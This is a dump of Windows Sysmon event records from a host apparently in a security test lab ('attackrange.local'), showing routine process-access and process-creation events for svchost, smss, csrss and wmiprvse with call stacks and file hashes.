13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-93F6-6005-E504-00000000A301}45482604C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.753{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000007c 10341000x80000000000000009669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E42-6005-0200-00000000A301}4484744C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.746{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 00000104 0000007c C:\Windows\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{59A5CD1D-8E42-6005-0200-00000000A301}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000009830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
